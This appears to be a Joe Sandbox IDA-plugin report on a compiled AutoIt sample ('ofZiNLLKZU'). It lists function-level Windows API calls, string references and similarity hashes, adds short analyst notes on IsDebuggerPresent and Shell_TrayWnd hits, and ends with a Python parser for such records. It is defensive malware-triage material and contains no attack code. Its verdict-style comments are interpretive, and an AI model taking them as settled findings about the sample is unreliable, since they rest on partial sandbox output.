                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0066327C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00663287
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                APIs
                                                                                  • Part of subcall function 005D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
                                                                                  • Part of subcall function 005D600E: GetStockObject.GDI32(00000011), ref: 005D6060
                                                                                  • Part of subcall function 005D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0066377A
                                                                                • GetSysColor.USER32(00000012), ref: 00663794
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0064CD7D
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0064CDA6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 006634AB
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006634BA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00636CB6
                                                                                • _wcslen.LIBCMT ref: 00636CC2
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: STOP
                                                                                • API String ID: 1256254125-2411985666
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 00633CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00633CCA
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00631C46
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 00633CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00633CCA
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00631CC8
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005EA529
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Init_thread_footer_wcslen
                                                                                • String ID: ,%j$3yb
                                                                                • API String ID: 2551934079-1169086100
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006A3018,006A305C), ref: 006681BF
                                                                                • CloseHandle.KERNEL32 ref: 006681D1
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: \0j
                                                                                • API String ID: 3712363035-3905335411
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: 3, 3, 16, 1
                                                                                • API String ID: 176396367-3042988571
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00630B23
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 2030045667-4017498283
                                                                                APIs
                                                                                  • Part of subcall function 005EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005F0D71,?,?,?,005D100A), ref: 005EF7CE
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,005D100A), ref: 005F0D75
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005D100A), ref: 005F0D84
                                                                                Strings
                                                                                 • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005F0D7F
                                                                                 • Note: this function is the stock ATL CAtlBaseModule constructor (atlcore.h). IsDebuggerPresent is called only to decide whether the failure text is emitted through OutputDebugStringW when InitializeCriticalSectionAndSpinCount fails, so this particular IsDebuggerPresent hit is compiler/library boilerplate rather than a deliberate anti-debugging check.
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 55579361-631824599
                                                                                • Opcode ID: 990600f77073500f70ab834aa79962b1c31000115910898e97a086a3885ffa64
                                                                                • Instruction ID: e03c2c46f0d8dc6b71d08411ae632ebbb66aa76ea423d81297cc3b7610f6bedf
                                                                                • Opcode Fuzzy Hash: 990600f77073500f70ab834aa79962b1c31000115910898e97a086a3885ffa64
                                                                                • Instruction Fuzzy Hash: C7E06D742007518BD7309FBCE4083667FE6BB04744F04992EE982C6692EBB6E4448B91
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005EE3D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: 0%j$8%j
                                                                                • API String ID: 1385522511-4048573861
                                                                                • Opcode ID: 2b218949b600adb177a07ac321b1717ad6f724781c7b95d1c915623ebe030ff8
                                                                                • Instruction ID: ff4221804de93a5cb59658d27f7acd750bae99986a337a5efbeac198952448c4
                                                                                • Opcode Fuzzy Hash: 2b218949b600adb177a07ac321b1717ad6f724781c7b95d1c915623ebe030ff8
                                                                                • Instruction Fuzzy Hash: 47E02635CA0956CBC70CBB1DF87AA98BB93BB4E320B102965E142875D29B343C418E54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: %.3d$X64
                                                                                • API String ID: 481472006-1077770165
                                                                                • Opcode ID: e886ce776387450fb963685b7694386224ec380c92d5bf8df137de9bf28950a1
                                                                                • Instruction ID: bdd9836331a5055bd8946272a744a67592491019d08795661557d15a2432d020
                                                                                • Opcode Fuzzy Hash: e886ce776387450fb963685b7694386224ec380c92d5bf8df137de9bf28950a1
                                                                                • Instruction Fuzzy Hash: 6AD0127180A529E9CB5097E0EC498B9B77DBB18301F608452FE4691040E624C709AF61
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066236C
                                                                                • PostMessageW.USER32(00000000), ref: 00662373
                                                                                  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: b860539ec58df242b55be1acf29e49c25fcfe8e3249e717da82a6c3639850e78
                                                                                • Instruction ID: 473631f5830b7befdf90c23d1ff26fad91bdaa7d6fc83fe90b27dd9b90f0a77b
                                                                                • Opcode Fuzzy Hash: b860539ec58df242b55be1acf29e49c25fcfe8e3249e717da82a6c3639850e78
                                                                                • Instruction Fuzzy Hash: 6DD0C9323817507AEAA4B770EC0FFD66A1A9B04B20F015916B686EA1D0C9E0A8018A58
                                                                                APIs
                                                                                 • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066232C
                                                                                 • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0066233F
                                                                                   • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                 • Note: FindWindowW("Shell_TrayWnd") followed by PostMessageW(hwnd, 0x111 = WM_COMMAND, 0x197, 0) and a Sleep is the pattern the AutoIt runtime uses to drive taskbar commands (its WinMinimizeAll built-in posts WM_COMMAND to Shell_TrayWnd the same way), which is consistent with the compiled-AutoIt-script verdict; the command ID in wParam selects the shell action. In the sibling function above the sandbox resolved only one PostMessageW argument, so the two records share API String ID 529655941-2988720461 while having different Opcode IDs.
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 4cfa5f9f071c49f509e87e9e25ec398a85a15dc0ec411adce4b79ae29d81851d
                                                                                • Instruction ID: af32c21afc9ace9d2fc1eb65a6f68437cd72d7111c4486f496dceaad0123d765
                                                                                • Opcode Fuzzy Hash: 4cfa5f9f071c49f509e87e9e25ec398a85a15dc0ec411adce4b79ae29d81851d
                                                                                • Instruction Fuzzy Hash: 73D01236394750B7EBA4B770EC0FFD67A1A9B04B20F015916B786EA1D0C9F0A801CB58
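The function records above all have the same shape: an APIs list with call sites, a Strings list with xrefs, the memory-dump provenance, and a Similarity block whose API String ID, Opcode ID and fuzzy hashes are what you would pivot on across samples. The following Python parser is an added example, not part of the Joe Sandbox report or its tooling: it turns that text into records, groups them by API String ID (which shows the two Shell_TrayWnd functions sharing an API/string signature while differing in Opcode ID), and decodes a PostMessageW argument list into a named window message. The sample input is copied from the two Shell_TrayWnd records above with the memory-dump lines trimmed; the WM_NAMES table is a small hand-picked constant list, not taken from the report.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Similarity) into dicts."""
import re
from collections import defaultdict

# Section headers exactly as they appear in the report; each record starts at "APIs".
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# "FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066236C"
# "Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3"  (no argument list)
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# "ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005F0D7F"
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")

# Hand-picked window message constants (assumption: only these are needed here).
WM_NAMES = {0x0010: "WM_CLOSE", 0x0100: "WM_KEYDOWN", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}

# Constructed test input: the two Shell_TrayWnd records from the report, dump lines trimmed.
SAMPLE = """
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066236C
• PostMessageW.USER32(00000000), ref: 00662373
  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: b860539ec58df242b55be1acf29e49c25fcfe8e3249e717da82a6c3639850e78
• Instruction Fuzzy Hash: 6DD0C9323817507AEAA4B770EC0FFD66A1A9B04B20F015916B686EA1D0C9E0A8018A58
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0066233F
  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 4cfa5f9f071c49f509e87e9e25ec398a85a15dc0ec411adce4b79ae29d81851d
• Instruction Fuzzy Hash: 73D01236394750B7EBA4B770EC0FFD67A1A9B04B20F015916B786EA1D0C9F0A801CB58
"""


def parse_report(text):
    """Return one dict per function record: {"apis": [...], "strings": [...], "meta": {...}}."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":  # a new function record begins with its APIs list
                rec = {"apis": [], "strings": [], "meta": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Strings":
            m = STR_RE.match(item)
            if m:
                rec["strings"].append(m.groupdict())
        else:  # provenance and Similarity blocks are "Key: value" items
            key, _, val = item.partition(":")
            key, val = key.strip(), val.strip()
            if key == "Associated":
                rec["meta"].setdefault(key, []).append(val)
            else:
                rec["meta"][key] = val
    return records


def group_by_api_string_id(records):
    """Map API String ID -> list of Opcode IDs, to spot same-signature, different-code functions."""
    groups = defaultdict(list)
    for rec in records:
        key = rec["meta"].get("API String ID")
        if key:
            groups[key].append(rec["meta"].get("Opcode ID"))
    return dict(groups)


def decode_post_message(api):
    """Decode a Post/SendMessage argument list; None when the sandbox resolved fewer than 4 args."""
    if api["api"] not in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"):
        return None
    parts = (api["args"] or "").split(",")
    if len(parts) != 4 or any(not re.fullmatch(r"[0-9A-Fa-f]+", p) for p in parts):
        return None
    hwnd, msg, wparam, lparam = (int(p, 16) for p in parts)
    return {"hwnd": hwnd, "msg": msg, "msg_name": WM_NAMES.get(msg, hex(msg)),
            "wparam": wparam, "lparam": lparam}


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    print(group_by_api_string_id(recs))
    for rec in recs:
        print(rec["meta"]["Opcode ID"][:16], [decode_post_message(a) for a in rec["apis"]])
```

Feeding the full function listing (rather than the trimmed SAMPLE) through parse_report gives one record per function; grouping on API String ID is the cheap first pass before comparing Instruction Fuzzy Hashes, and decode_post_message returning None is the signal that the sandbox only recovered a partial argument list for that call site.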